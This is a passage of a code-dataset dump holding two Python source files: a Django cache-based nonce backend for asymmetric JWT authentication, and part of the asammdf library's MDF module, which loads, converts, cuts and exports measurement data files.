repo_name
stringlengths 5
100
| path
stringlengths 4
254
| copies
stringlengths 1
5
| size
stringlengths 4
7
| content
stringlengths 681
1M
| license
stringclasses 15
values | hash
int64 -9,223,351,895,964,839,000
9,223,298,349B
| line_mean
float64 3.5
100
| line_max
int64 15
1k
| alpha_frac
float64 0.25
0.97
| autogenerated
bool 1
class | ratio
float64 1.5
8.15
| config_test
bool 2
classes | has_no_keywords
bool 2
classes | few_assignments
bool 1
class |
---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
crgwbr/asymmetric_jwt_auth | src/asymmetric_jwt_auth/nonce/django.py | 1 | 1352 | from django.core.cache import cache
from django.conf import settings
from .. import default_settings
from . import BaseNonceBackend
class DjangoCacheNonceBackend(BaseNonceBackend):
"""
Nonce backend which uses DJango's cache system.
Simple, but not great. Prone to race conditions.
"""
def validate_nonce(self, username: str, timestamp: int, nonce: str) -> bool:
"""
Confirm that the given nonce hasn't already been used.
"""
key = self._create_nonce_key(username, timestamp)
used = cache.get(key, set([]))
return nonce not in used
def log_used_nonce(self, username: str, timestamp: int, nonce: str) -> None:
"""
Log a nonce as being used, and therefore henceforth invalid.
"""
key = self._create_nonce_key(username, timestamp)
used = cache.get(key, set([]))
used.add(nonce)
timestamp_tolerance = getattr(settings, 'ASYMMETRIC_JWT_AUTH', default_settings)['TIMESTAMP_TOLERANCE']
cache.set(key, used, timestamp_tolerance * 2)
def _create_nonce_key(self, username: str, timestamp: int) -> str:
"""
Create and return the cache key for storing nonces
"""
return '%s-nonces-%s-%s' % (
self.__class__.__name__,
username,
timestamp,
)
| isc | 5,193,959,262,588,831,000 | 31.190476 | 111 | 0.611686 | false | 4.035821 | false | false | false |
danielhrisca/asammdf | asammdf/mdf.py | 1 | 172031 | # -*- coding: utf-8 -*-
""" common MDF file format module """
from collections import defaultdict, OrderedDict
from copy import deepcopy
import csv
from datetime import datetime, timezone
from functools import reduce
from io import BytesIO
import logging
from pathlib import Path
import re
from shutil import copy
from struct import unpack
import zipfile, gzip, bz2
from traceback import format_exc
import xml.etree.ElementTree as ET
from canmatrix import CanMatrix
import numpy as np
import pandas as pd
from .blocks import v2_v3_constants as v23c
from .blocks import v4_constants as v4c
from .blocks.bus_logging_utils import extract_mux
from .blocks.conversion_utils import from_dict
from .blocks.mdf_v2 import MDF2
from .blocks.mdf_v3 import MDF3
from .blocks.mdf_v4 import MDF4
from .blocks.utils import (
components,
csv_bytearray2hex,
csv_int2hex,
downcast,
is_file_like,
load_can_database,
master_using_raster,
matlab_compatible,
MDF2_VERSIONS,
MDF3_VERSIONS,
MDF4_VERSIONS,
MdfException,
plausible_timestamps,
randomized_string,
SUPPORTED_VERSIONS,
UINT16_u,
UINT64_u,
UniqueDB,
validate_version_argument,
)
from .blocks.v2_v3_blocks import ChannelConversion as ChannelConversionV3
from .blocks.v2_v3_blocks import ChannelExtension
from .blocks.v2_v3_blocks import HeaderBlock as HeaderV3
from .blocks.v4_blocks import ChannelConversion as ChannelConversionV4
from .blocks.v4_blocks import EventBlock, FileHistory
from .blocks.v4_blocks import HeaderBlock as HeaderV4
from .blocks.v4_blocks import SourceInformation
from .signal import Signal
from .version import __version__
logger = logging.getLogger("asammdf")
LOCAL_TIMEZONE = datetime.now(timezone.utc).astimezone().tzinfo
__all__ = ["MDF", "SUPPORTED_VERSIONS"]
def get_measurement_timestamp_and_version(mdf, file):
mdf.seek(64)
blk_id = mdf.read(2)
if blk_id == b"HD":
header = HeaderV3
version = "3.00"
else:
version = "4.00"
blk_id += mdf.read(2)
if blk_id == b"##HD":
header = HeaderV4
else:
raise MdfException(f'"{file}" is not a valid MDF file')
header = header(address=64, stream=mdf)
return header.start_time, version
class MDF:
"""Unified access to MDF v3 and v4 files. Underlying _mdf's attributes and
methods are linked to the `MDF` object via *setattr*. This is done to expose
them to the user code and for performance considerations.
Parameters
----------
name : string | BytesIO | zipfile.ZipFile | bz2.BZ2File | gzip.GzipFile
mdf file name (if provided it must be a real file name), file-like object or
compressed file opened as Python object
.. versionchanged:: 6.2.0
added support for zipfile.ZipFile, bz2.BZ2File and gzip.GzipFile
version : string
mdf file version from ('2.00', '2.10', '2.14', '3.00', '3.10', '3.20',
'3.30', '4.00', '4.10', '4.11', '4.20'); default '4.10'. This argument is
only used for MDF objects created from scratch; for MDF objects created
from a file the version is set to file version
channels : iterable
channel names that will used for selective loading. This can dramatically
improve the file loading time.
.. versionadded:: 6.1.0
callback (\*\*kwargs) : function
keyword only argument: function to call to update the progress; the
function must accept two arguments (the current progress and maximum
progress value)
use_display_names (\*\*kwargs) : bool
keyword only argument: for MDF4 files parse the XML channel comment to
search for the display name; XML parsing is quite expensive so setting
this to *False* can decrease the loading times very much; default
*False*
remove_source_from_channel_names (\*\*kwargs) : bool
remove source from channel names ("Speed\XCP3" -> "Speed")
copy_on_get (\*\*kwargs) : bool
copy arrays in the get method; default *True*
expand_zippedfile (\*\*kwargs) : bool
only for bz2.BZ2File and gzip.GzipFile, load the file content into a
BytesIO before parsing (avoids the huge performance penalty of doing
random reads from the zipped file); default *True*
Examples
--------
>>> mdf = MDF(version='3.30') # new MDF object with version 3.30
>>> mdf = MDF('path/to/file.mf4') # MDF loaded from file
>>> mdf = MDF(BytesIO(data)) # MDF from file contents
>>> mdf = MDF(zipfile.ZipFile('data.zip')) # MDF creating using the first valid MDF from archive
>>> mdf = MDF(bz2.BZ2File('path/to/data.bz2', 'rb')) # MDF from bz2 object
>>> mdf = MDF(gzip.GzipFile('path/to/data.gzip', 'rb')) # MDF from gzip object
"""
_terminate = False
def __init__(self, name=None, version="4.10", channels=(), **kwargs):
self._mdf = None
expand_zippedfile = kwargs.pop("expand_zippedfile", True)
if name:
if is_file_like(name):
file_stream = name
do_close = False
if expand_zippedfile and isinstance(file_stream, (bz2.BZ2File, gzip.GzipFile)):
if isinstance(file_stream, (bz2.BZ2File, gzip.GzipFile)):
file_stream.seek(0)
file_stream = BytesIO(file_stream.read())
name = file_stream
elif isinstance(name, zipfile.ZipFile):
do_close = False
file_stream = name
for fn in file_stream.namelist():
if fn.lower().endswith(('mdf', 'dat', 'mf4')):
break
else:
raise Exception
file_stream = name = BytesIO(file_stream.read(fn))
else:
name = Path(name)
if name.is_file():
do_close = True
file_stream = open(name, "rb")
else:
raise MdfException(f'File "{name}" does not exist')
file_stream.seek(0)
magic_header = file_stream.read(8)
if magic_header.strip() not in (b"MDF", b"UnFinMF"):
raise MdfException(
f'"{name}" is not a valid ASAM MDF file: magic header is {magic_header}'
)
file_stream.seek(8)
version = file_stream.read(4).decode("ascii").strip(" \0")
if not version:
file_stream.read(16)
version = unpack("<H", file_stream.read(2))[0]
version = str(version)
version = f"{version[0]}.{version[1:]}"
if do_close:
file_stream.close()
if version in MDF3_VERSIONS:
self._mdf = MDF3(name, channels=channels, **kwargs)
elif version in MDF4_VERSIONS:
self._mdf = MDF4(name, channels=channels, **kwargs)
elif version in MDF2_VERSIONS:
self._mdf = MDF2(name, channels=channels, **kwargs)
else:
message = f'"{name}" is not a supported MDF file; "{version}" file version was found'
raise MdfException(message)
else:
version = validate_version_argument(version)
if version in MDF2_VERSIONS:
self._mdf = MDF3(version=version, **kwargs)
elif version in MDF3_VERSIONS:
self._mdf = MDF3(version=version, **kwargs)
elif version in MDF4_VERSIONS:
self._mdf = MDF4(version=version, **kwargs)
else:
message = (
f'"{version}" is not a supported MDF file version; '
f"Supported versions are {SUPPORTED_VERSIONS}"
)
raise MdfException(message)
# we need a backreference to the MDF object to avoid it being garbage
# collected in code like this:
# MDF(filename).convert('4.10')
self._mdf._parent = self
def __setattr__(self, item, value):
if item == "_mdf":
super().__setattr__(item, value)
else:
setattr(self._mdf, item, value)
def __getattr__(self, item):
return getattr(self._mdf, item)
def __dir__(self):
return sorted(set(super().__dir__()) | set(dir(self._mdf)))
def __enter__(self):
return self
def __exit__(self, exc_type, exc_value, traceback):
if self._mdf is not None:
try:
self.close()
except:
pass
self._mdf = None
def __del__(self):
if self._mdf is not None:
try:
self.close()
except:
pass
self._mdf = None
def __lt__(self, other):
if self.header.start_time < other.header.start_time:
return True
elif self.header.start_time > other.header.start_time:
return False
else:
t_min = []
for i, group in enumerate(self.groups):
cycles_nr = group.channel_group.cycles_nr
if cycles_nr and i in self.masters_db:
master_min = self.get_master(i, record_offset=0, record_count=1)
if len(master_min):
t_min.append(master_min[0])
other_t_min = []
for i, group in enumerate(other.groups):
cycles_nr = group.channel_group.cycles_nr
if cycles_nr and i in other.masters_db:
master_min = other.get_master(i, record_offset=0, record_count=1)
if len(master_min):
other_t_min.append(master_min[0])
if not t_min or not other_t_min:
return True
else:
return min(t_min) < min(other_t_min)
def _transfer_events(self, other):
def get_scopes(event, events):
if event.scopes:
return event.scopes
else:
if event.parent is not None:
return get_scopes(events[event.parent], events)
elif event.range_start is not None:
return get_scopes(events[event.range_start], events)
else:
return event.scopes
if other.version >= "4.00":
for event in other.events:
if self.version >= "4.00":
new_event = deepcopy(event)
event_valid = True
for i, ref in enumerate(new_event.scopes):
try:
dg_cntr, ch_cntr = ref
try:
(self.groups[dg_cntr].channels[ch_cntr])
except:
event_valid = False
except TypeError:
dg_cntr = ref
try:
(self.groups[dg_cntr].channel_group)
except:
event_valid = False
# ignore attachments for now
for i in range(new_event.attachment_nr):
key = f"attachment_{i}_addr"
event[key] = 0
if event_valid:
self.events.append(new_event)
else:
ev_type = event.event_type
ev_range = event.range_type
ev_base = event.sync_base
ev_factor = event.sync_factor
timestamp = ev_base * ev_factor
try:
comment = ET.fromstring(
event.comment.replace(
' xmlns="http://www.asam.net/mdf/v4"', ""
)
)
pre = comment.find(".//pre_trigger_interval")
if pre is not None:
pre = float(pre.text)
else:
pre = 0.0
post = comment.find(".//post_trigger_interval")
if post is not None:
post = float(post.text)
else:
post = 0.0
comment = comment.find(".//TX")
if comment is not None:
comment = comment.text
else:
comment = ""
except:
pre = 0.0
post = 0.0
comment = event.comment
if comment:
comment += ": "
if ev_range == v4c.EVENT_RANGE_TYPE_BEGINNING:
comment += "Begin of "
elif ev_range == v4c.EVENT_RANGE_TYPE_END:
comment += "End of "
else:
comment += "Single point "
if ev_type == v4c.EVENT_TYPE_RECORDING:
comment += "recording"
elif ev_type == v4c.EVENT_TYPE_RECORDING_INTERRUPT:
comment += "recording interrupt"
elif ev_type == v4c.EVENT_TYPE_ACQUISITION_INTERRUPT:
comment += "acquisition interrupt"
elif ev_type == v4c.EVENT_TYPE_START_RECORDING_TRIGGER:
comment += "measurement start trigger"
elif ev_type == v4c.EVENT_TYPE_STOP_RECORDING_TRIGGER:
comment += "measurement stop trigger"
elif ev_type == v4c.EVENT_TYPE_TRIGGER:
comment += "trigger"
else:
comment += "marker"
scopes = get_scopes(event, other.events)
if scopes:
for i, ref in enumerate(scopes):
event_valid = True
try:
dg_cntr, ch_cntr = ref
try:
(self.groups[dg_cntr])
except:
event_valid = False
except TypeError:
dg_cntr = ref
try:
(self.groups[dg_cntr])
except:
event_valid = False
if event_valid:
self.add_trigger(
dg_cntr,
timestamp,
pre_time=pre,
post_time=post,
comment=comment,
)
else:
for i, _ in enumerate(self.groups):
self.add_trigger(
i,
timestamp,
pre_time=pre,
post_time=post,
comment=comment,
)
else:
for trigger_info in other.iter_get_triggers():
comment = trigger_info["comment"]
timestamp = trigger_info["time"]
group = trigger_info["group"]
if self.version < "4.00":
self.add_trigger(
group,
timestamp,
pre_time=trigger_info["pre_time"],
post_time=trigger_info["post_time"],
comment=comment,
)
else:
if timestamp:
ev_type = v4c.EVENT_TYPE_TRIGGER
else:
ev_type = v4c.EVENT_TYPE_START_RECORDING_TRIGGER
event = EventBlock(
event_type=ev_type,
sync_base=int(timestamp * 10 ** 9),
sync_factor=10 ** -9,
scope_0_addr=0,
)
event.comment = comment
event.scopes.append(group)
self.events.append(event)
def _transfer_header_data(self, other, message=""):
self.header.author = other.header.author
self.header.department = other.header.department
self.header.project = other.header.project
self.header.subject = other.header.subject
self.header.comment = other.header.comment
if self.version >= "4.00" and message:
fh = FileHistory()
fh.comment = f"""<FHcomment>
<TX>{message}</TX>
<tool_id>asammdf</tool_id>
<tool_vendor>asammdf</tool_vendor>
<tool_version>{__version__}</tool_version>
</FHcomment>"""
self.file_history = [fh]
@staticmethod
def _transfer_channel_group_data(sgroup, ogroup):
if not hasattr(sgroup, "acq_name") or not hasattr(ogroup, "acq_name"):
sgroup.comment = ogroup.comment
else:
sgroup.flags = ogroup.flags
sgroup.path_separator = ogroup.path_separator
sgroup.comment = ogroup.comment
sgroup.acq_name = ogroup.acq_name
acq_source = ogroup.acq_source
if acq_source:
sgroup.acq_source = acq_source.copy()
def _transfer_metadata(self, other, message=""):
self._transfer_events(other)
self._transfer_header_data(other, message)
def __contains__(self, channel):
""" if *'channel name'* in *'mdf file'* """
return channel in self.channels_db
def __iter__(self):
"""iterate over all the channels found in the file; master channels
are skipped from iteration
"""
yield from self.iter_channels()
def convert(self, version):
"""convert *MDF* to other version
Parameters
----------
version : str
new mdf file version from ('2.00', '2.10', '2.14', '3.00', '3.10',
'3.20', '3.30', '4.00', '4.10', '4.11', '4.20'); default '4.10'
Returns
-------
out : MDF
new *MDF* object
"""
version = validate_version_argument(version)
out = MDF(
version=version,
**self._kwargs
)
integer_interpolation_mode = self._integer_interpolation
float_interpolation_mode = self._float_interpolation
out.configure(from_other=self)
out.header.start_time = self.header.start_time
groups_nr = len(self.virtual_groups)
if self._callback:
self._callback(0, groups_nr)
cg_nr = None
self.configure(copy_on_get=False)
# walk through all groups and get all channels
for i, virtual_group in enumerate(self.virtual_groups):
for idx, sigs in enumerate(
self._yield_selected_signals(virtual_group, version=version)
):
if idx == 0:
if sigs:
cg = self.groups[virtual_group].channel_group
cg_nr = out.append(
sigs,
common_timebase=True,
)
MDF._transfer_channel_group_data(
out.groups[cg_nr].channel_group, cg
)
else:
break
else:
out.extend(cg_nr, sigs)
if self._callback:
self._callback(i + 1, groups_nr)
if self._terminate:
return
out._transfer_metadata(self, message=f"Converted from <{self.name}>")
self.configure(copy_on_get=True)
if self._callback:
out._callback = out._mdf._callback = self._callback
return out
def cut(
self,
start=None,
stop=None,
whence=0,
version=None,
include_ends=True,
time_from_zero=False,
):
"""cut *MDF* file. *start* and *stop* limits are absolute values
or values relative to the first timestamp depending on the *whence*
argument.
Parameters
----------
start : float
start time, default *None*. If *None* then the start of measurement
is used
stop : float
stop time, default *None*. If *None* then the end of measurement is
used
whence : int
how to search for the start and stop values
* 0 : absolute
* 1 : relative to first timestamp
version : str
new mdf file version from ('2.00', '2.10', '2.14', '3.00', '3.10',
'3.20', '3.30', '4.00', '4.10', '4.11', 4.20'); default *None* and in this
case the original file version is used
include_ends : bool
include the *start* and *stop* timestamps after cutting the signal.
If *start* and *stop* are found in the original timestamps, then
the new samples will be computed using interpolation. Default *True*
time_from_zero : bool
start time stamps from 0s in the cut measurement
Returns
-------
out : MDF
new MDF object
"""
if version is None:
version = self.version
else:
version = validate_version_argument(version)
out = MDF(
version=version,
**self._kwargs,
)
integer_interpolation_mode = self._integer_interpolation
float_interpolation_mode = self._float_interpolation
out.configure(from_other=self)
self.configure(copy_on_get=False)
if whence == 1:
timestamps = []
for group in self.virtual_groups:
master = self.get_master(group, record_offset=0, record_count=1)
if master.size:
timestamps.append(master[0])
if timestamps:
first_timestamp = np.amin(timestamps)
else:
first_timestamp = 0
if start is not None:
start += first_timestamp
if stop is not None:
stop += first_timestamp
if time_from_zero:
delta = start
t_epoch = self.header.start_time.timestamp() + delta
out.header.start_time = datetime.fromtimestamp(t_epoch)
else:
delta = 0
out.header.start_time = self.header.start_time
groups_nr = len(self.virtual_groups)
if self._callback:
self._callback(0, groups_nr)
# walk through all groups and get all channels
for i, (group_index, virtual_group) in enumerate(self.virtual_groups.items()):
included_channels = self.included_channels(group_index)[group_index]
if not included_channels:
continue
idx = 0
signals = []
for j, sigs in enumerate(
self._yield_selected_signals(group_index, groups=included_channels)
):
if not sigs:
break
if j == 0:
master = sigs[0].timestamps
signals = sigs
else:
master = sigs[0][0]
if not len(master):
continue
needs_cutting = True
# check if this fragement is within the cut interval or
# if the cut interval has ended
if start is None and stop is None:
fragment_start = None
fragment_stop = None
start_index = 0
stop_index = len(master)
needs_cutting = False
elif start is None:
fragment_start = None
start_index = 0
if master[0] > stop:
break
else:
fragment_stop = min(stop, master[-1])
stop_index = np.searchsorted(
master, fragment_stop, side="right"
)
if stop_index == len(master):
needs_cutting = False
elif stop is None:
fragment_stop = None
if master[-1] < start:
continue
else:
fragment_start = max(start, master[0])
start_index = np.searchsorted(
master, fragment_start, side="left"
)
stop_index = len(master)
if start_index == 0:
needs_cutting = False
else:
if master[0] > stop:
break
elif master[-1] < start:
continue
else:
fragment_start = max(start, master[0])
start_index = np.searchsorted(
master, fragment_start, side="left"
)
fragment_stop = min(stop, master[-1])
stop_index = np.searchsorted(
master, fragment_stop, side="right"
)
if start_index == 0 and stop_index == len(master):
needs_cutting = False
# update the signal is this is not the first yield
if j:
for signal, (samples, invalidation) in zip(signals, sigs[1:]):
signal.samples = samples
signal.timestamps = master
signal.invalidation_bits = invalidation
if needs_cutting:
master = (
Signal(master, master, name="_")
.cut(
fragment_start,
fragment_stop,
include_ends,
integer_interpolation_mode=integer_interpolation_mode,
float_interpolation_mode=float_interpolation_mode,
)
.timestamps
)
if not len(master):
continue
signals = [
sig.cut(
master[0],
master[-1],
include_ends=include_ends,
integer_interpolation_mode=integer_interpolation_mode,
float_interpolation_mode=float_interpolation_mode,
)
for sig in signals
]
else:
for sig in signals:
native = sig.samples.dtype.newbyteorder("=")
if sig.samples.dtype != native:
sig.samples = sig.samples.astype(native)
if time_from_zero:
master = master - delta
for sig in signals:
sig.timestamps = master
if idx == 0:
if start:
start_ = f"{start}s"
else:
start_ = "start of measurement"
if stop:
stop_ = f"{stop}s"
else:
stop_ = "end of measurement"
cg = self.groups[group_index].channel_group
cg_nr = out.append(
signals,
common_timebase=True,
)
MDF._transfer_channel_group_data(
out.groups[cg_nr].channel_group, cg
)
else:
sigs = [(sig.samples, sig.invalidation_bits) for sig in signals]
sigs.insert(0, (master, None))
out.extend(cg_nr, sigs)
idx += 1
# if the cut interval is not found in the measurement
# then append a data group with 0 cycles
if idx == 0 and signals:
for sig in signals:
sig.samples = sig.samples[:0]
sig.timestamps = sig.timestamps[:0]
if sig.invalidation_bits is not None:
sig.invaldiation_bits = sig.invalidation_bits[:0]
if start:
start_ = f"{start}s"
else:
start_ = "start of measurement"
if stop:
stop_ = f"{stop}s"
else:
stop_ = "end of measurement"
cg = self.groups[group_index].channel_group
cg_nr = out.append(
signals,
common_timebase=True,
)
MDF._transfer_channel_group_data(out.groups[cg_nr].channel_group, cg)
if self._callback:
self._callback(i + 1, groups_nr)
if self._terminate:
return
self.configure(copy_on_get=True)
out._transfer_metadata(self, message=f"Cut from {start_} to {stop_}")
if self._callback:
out._callback = out._mdf._callback = self._callback
return out
def export(self, fmt, filename=None, **kwargs):
r"""export *MDF* to other formats. The *MDF* file name is used is
available, else the *filename* argument must be provided.
The *pandas* export option was removed. you should use the method
*to_dataframe* instead.
Parameters
----------
fmt : string
can be one of the following:
* `csv` : CSV export that uses the "," delimiter. This option
will generate a new csv file for each data group
(<MDFNAME>_DataGroup_<cntr>.csv)
* `hdf5` : HDF5 file output; each *MDF* data group is mapped to
a *HDF5* group with the name 'DataGroup_<cntr>'
(where <cntr> is the index)
* `mat` : Matlab .mat version 4, 5 or 7.3 export. If
*single_time_base==False* the channels will be renamed in the mat
file to 'D<cntr>_<channel name>'. The channel group
master will be renamed to 'DM<cntr>_<channel name>'
( *<cntr>* is the data group index starting from 0)
* `parquet` : export to Apache parquet format
filename : string | pathlib.Path
export file name
\*\*kwargs
* `single_time_base`: resample all channels to common time base,
default *False*
* `raster`: float time raster for resampling. Valid if
*single_time_base* is *True*
* `time_from_zero`: adjust time channel to start from 0
* `use_display_names`: use display name instead of standard channel
name, if available.
* `empty_channels`: behaviour for channels without samples; the
options are *skip* or *zeros*; default is *skip*
* `format`: only valid for *mat* export; can be '4', '5' or '7.3',
default is '5'
* `oned_as`: only valid for *mat* export; can be 'row' or 'column'
* `keep_arrays` : keep arrays and structure channels as well as the
component channels. If *True* this can be very slow. If *False*
only the component channels are saved, and their names will be
prefixed with the parent channel.
* `reduce_memory_usage` : bool
reduce memory usage by converting all float columns to float32 and
searching for minimum dtype that can reprezent the values found
in integer columns; default *False*
* `compression` : str
compression to be used
* for ``parquet`` : "GZIP" or "SANPPY"
* for ``hfd5`` : "gzip", "lzf" or "szip"
* for ``mat`` : bool
* `time_as_date` (False) : bool
export time as local timezone datetimee; only valid for CSV export
.. versionadded:: 5.8.0
* `ignore_value2text_conversions` (False) : bool
valid only for the channels that have value to text conversions and
if *raw=False*. If this is True then the raw numeric values will be
used, and the conversion will not be applied.
.. versionadded:: 5.8.0
* raw (False) : bool
export all channels using the raw values
.. versionadded:: 6.0.0
* delimiter (',') : str
only valid for CSV: see cpython documentation for csv.Dialect.delimiter
.. versionadded:: 6.2.0
* doublequote (True) : bool
only valid for CSV: see cpython documentation for csv.Dialect.doublequote
.. versionadded:: 6.2.0
* escapechar (None) : str
only valid for CSV: see cpython documentation for csv.Dialect.escapechar
.. versionadded:: 6.2.0
* lineterminator ("\\r\\n") : str
only valid for CSV: see cpython documentation for csv.Dialect.lineterminator
.. versionadded:: 6.2.0
* quotechar ('"') : str
only valid for CSV: see cpython documentation for csv.Dialect.quotechar
.. versionadded:: 6.2.0
* quoting ("MINIMAL") : str
only valid for CSV: see cpython documentation for csv.Dialect.quoting. Use the
last part of the quoting constant name
.. versionadded:: 6.2.0
"""
header_items = (
"date",
"time",
"author_field",
"department_field",
"project_field",
"subject_field",
)
if fmt != "pandas" and filename is None and self.name is None:
message = (
"Must specify filename for export"
"if MDF was created without a file name"
)
logger.warning(message)
return
single_time_base = kwargs.get("single_time_base", False)
raster = kwargs.get("raster", None)
time_from_zero = kwargs.get("time_from_zero", True)
use_display_names = kwargs.get("use_display_names", True)
empty_channels = kwargs.get("empty_channels", "skip")
format = kwargs.get("format", "5")
oned_as = kwargs.get("oned_as", "row")
reduce_memory_usage = kwargs.get("reduce_memory_usage", False)
compression = kwargs.get("compression", "")
time_as_date = kwargs.get("time_as_date", False)
ignore_value2text_conversions = kwargs.get(
"ignore_value2text_conversions", False
)
raw = bool(kwargs.get("raw", False))
if compression == "SNAPPY":
try:
import snappy
except ImportError:
logger.warning(
"snappy compressor is not installed; compression will be set to GZIP"
)
compression = "GZIP"
filename = Path(filename) if filename else self.name
if fmt == "parquet":
try:
from fastparquet import write as write_parquet
except ImportError:
logger.warning(
"fastparquet not found; export to parquet is unavailable"
)
return
elif fmt == "hdf5":
try:
from h5py import File as HDF5
except ImportError:
logger.warning("h5py not found; export to HDF5 is unavailable")
return
elif fmt == "mat":
if format == "7.3":
try:
from hdf5storage import savemat
except ImportError:
logger.warning(
"hdf5storage not found; export to mat v7.3 is unavailable"
)
return
else:
try:
from scipy.io import savemat
except ImportError:
logger.warning("scipy not found; export to mat is unavailable")
return
elif fmt not in ("csv",):
raise MdfException(f"Export to {fmt} is not implemented")
name = ""
if self._callback:
self._callback(0, 100)
if single_time_base or fmt == "parquet":
df = self.to_dataframe(
raster=raster,
time_from_zero=time_from_zero,
use_display_names=use_display_names,
empty_channels=empty_channels,
reduce_memory_usage=reduce_memory_usage,
ignore_value2text_conversions=ignore_value2text_conversions,
raw=raw,
)
units = OrderedDict()
comments = OrderedDict()
used_names = UniqueDB()
dropped = {}
groups_nr = len(self.groups)
for i, grp in enumerate(self.groups):
if self._terminate:
return
for ch in grp.channels:
if use_display_names:
channel_name = ch.display_name or ch.name
else:
channel_name = ch.name
channel_name = used_names.get_unique_name(channel_name)
if hasattr(ch, "unit"):
unit = ch.unit
if ch.conversion:
unit = unit or ch.conversion.unit
else:
unit = ""
comment = ch.comment
units[channel_name] = unit
comments[channel_name] = comment
if self._callback:
self._callback(i + 1, groups_nr * 2)
if fmt == "hdf5":
filename = filename.with_suffix(".hdf")
if single_time_base:
with HDF5(str(filename), "w") as hdf:
# header information
group = hdf.create_group(str(filename))
if self.version in MDF2_VERSIONS + MDF3_VERSIONS:
for item in header_items:
group.attrs[item] = self.header[item].replace(b"\0", b"")
# save each data group in a HDF5 group called
# "DataGroup_<cntr>" with the index starting from 1
# each HDF5 group will have a string attribute "master"
# that will hold the name of the master channel
count = len(df.columns)
for i, channel in enumerate(df):
samples = df[channel]
unit = units.get(channel, "")
comment = comments.get(channel, "")
if samples.dtype.kind == "O":
if isinstance(samples[0], np.ndarray):
samples = np.vstack(samples)
else:
continue
if compression:
dataset = group.create_dataset(
channel, data=samples, compression=compression
)
else:
dataset = group.create_dataset(channel, data=samples)
unit = unit.replace("\0", "")
if unit:
dataset.attrs["unit"] = unit
comment = comment.replace("\0", "")
if comment:
dataset.attrs["comment"] = comment
if self._callback:
self._callback(i + 1 + count, count * 2)
else:
with HDF5(str(filename), "w") as hdf:
# header information
group = hdf.create_group(str(filename))
if self.version in MDF2_VERSIONS + MDF3_VERSIONS:
for item in header_items:
group.attrs[item] = self.header[item].replace(b"\0", b"")
# save each data group in a HDF5 group called
# "DataGroup_<cntr>" with the index starting from 1
# each HDF5 group will have a string attribute "master"
# that will hold the name of the master channel
groups_nr = len(self.virtual_groups)
for i, (group_index, virtual_group) in enumerate(
self.virtual_groups.items()
):
channels = self.included_channels(group_index)[group_index]
if not channels:
continue
names = UniqueDB()
if self._terminate:
return
if len(virtual_group.groups) == 1:
comment = self.groups[
virtual_group.groups[0]
].channel_group.comment
else:
comment = "Virtual group i"
group_name = r"/" + f"ChannelGroup_{i}"
group = hdf.create_group(group_name)
group.attrs["comment"] = comment
master_index = self.masters_db.get(group_index, -1)
if master_index >= 0:
group.attrs["master"] = (
self.groups[group_index].channels[master_index].name
)
channels = [
(None, gp_index, ch_index)
for gp_index, channel_indexes in channels.items()
for ch_index in channel_indexes
]
if not channels:
continue
channels = self.select(channels, raw=raw)
for j, sig in enumerate(channels):
if use_display_names:
name = sig.display_name or sig.name
else:
name = sig.name
name = name.replace("\\", "_").replace("/", "_")
name = names.get_unique_name(name)
if reduce_memory_usage:
sig.samples = downcast(sig.samples)
if compression:
dataset = group.create_dataset(
name, data=sig.samples, compression=compression
)
else:
dataset = group.create_dataset(
name, data=sig.samples, dtype=sig.samples.dtype
)
unit = sig.unit.replace("\0", "")
if unit:
dataset.attrs["unit"] = unit
comment = sig.comment.replace("\0", "")
if comment:
dataset.attrs["comment"] = comment
if self._callback:
self._callback(i + 1, groups_nr)
elif fmt == "csv":
fmtparams = {
"delimiter": kwargs.get("delimiter", ",")[0],
"doublequote": kwargs.get("doublequote", True),
"lineterminator": kwargs.get("lineterminator", '\r\n'),
"quotechar": kwargs.get("quotechar", '"')[0],
}
quoting = kwargs.get("quoting", "MINIMAL").upper()
quoting = getattr(csv, f"QUOTE_{quoting}")
fmtparams["quoting"] = quoting
escapechar = kwargs.get("escapechar", None)
if escapechar is not None:
escapechar = escapechar[0]
fmtparams["escapechar"] = escapechar
if single_time_base:
filename = filename.with_suffix(".csv")
message = f'Writing csv export to file "{filename}"'
logger.info(message)
if time_as_date:
index = (
pd.to_datetime(
df.index + self.header.start_time.timestamp(), unit="s"
)
.tz_localize("UTC")
.tz_convert(LOCAL_TIMEZONE)
.astype(str)
)
df.index = index
df.index.name = "timestamps"
if hasattr(self, "can_logging_db") and self.can_logging_db:
dropped = {}
for name_ in df.columns:
if name_.endswith("CAN_DataFrame.ID"):
dropped[name_] = pd.Series(
csv_int2hex(df[name_].astype("<u4") & 0x1FFFFFFF),
index=df.index,
)
elif name_.endswith("CAN_DataFrame.DataBytes"):
dropped[name_] = pd.Series(
csv_bytearray2hex(df[name_]), index=df.index
)
df = df.drop(columns=list(dropped))
for name, s in dropped.items():
df[name] = s
with open(filename, "w", newline="") as csvfile:
writer = csv.writer(csvfile, **fmtparams)
names_row = [df.index.name, *df.columns]
writer.writerow(names_row)
if reduce_memory_usage:
vals = [df.index, *(df[name] for name in df)]
else:
vals = [
df.index.to_list(),
*(df[name].to_list() for name in df),
]
count = len(df.index)
if self._terminate:
return
for i, row in enumerate(zip(*vals)):
writer.writerow(row)
if self._callback:
self._callback(i + 1 + count, count * 2)
else:
filename = filename.with_suffix(".csv")
gp_count = len(self.virtual_groups)
for i, (group_index, virtual_group) in enumerate(
self.virtual_groups.items()
):
if self._terminate:
return
message = f"Exporting group {i+1} of {gp_count}"
logger.info(message)
if len(virtual_group.groups) == 1:
comment = self.groups[
virtual_group.groups[0]
].channel_group.comment
else:
comment = ""
if comment:
for char in r' \/:"':
comment = comment.replace(char, "_")
group_csv_name = (
filename.parent
/ f"{filename.stem}.ChannelGroup_{i}_{comment}.csv"
)
else:
group_csv_name = (
filename.parent / f"{filename.stem}.ChannelGroup_{i}.csv"
)
df = self.get_group(
group_index,
raster=raster,
time_from_zero=time_from_zero,
use_display_names=use_display_names,
reduce_memory_usage=reduce_memory_usage,
ignore_value2text_conversions=ignore_value2text_conversions,
raw=raw,
)
if time_as_date:
index = (
pd.to_datetime(
df.index + self.header.start_time.timestamp(), unit="s"
)
.tz_localize("UTC")
.tz_convert(LOCAL_TIMEZONE)
.astype(str)
)
df.index = index
df.index.name = "timestamps"
with open(group_csv_name, "w", newline="") as csvfile:
writer = csv.writer(csvfile, **fmtparams)
if hasattr(self, "can_logging_db") and self.can_logging_db:
dropped = {}
for name_ in df.columns:
if name_.endswith("CAN_DataFrame.ID"):
dropped[name_] = pd.Series(
csv_int2hex(df[name_] & 0x1FFFFFFF),
index=df.index,
)
elif name_.endswith("CAN_DataFrame.DataBytes"):
dropped[name_] = pd.Series(
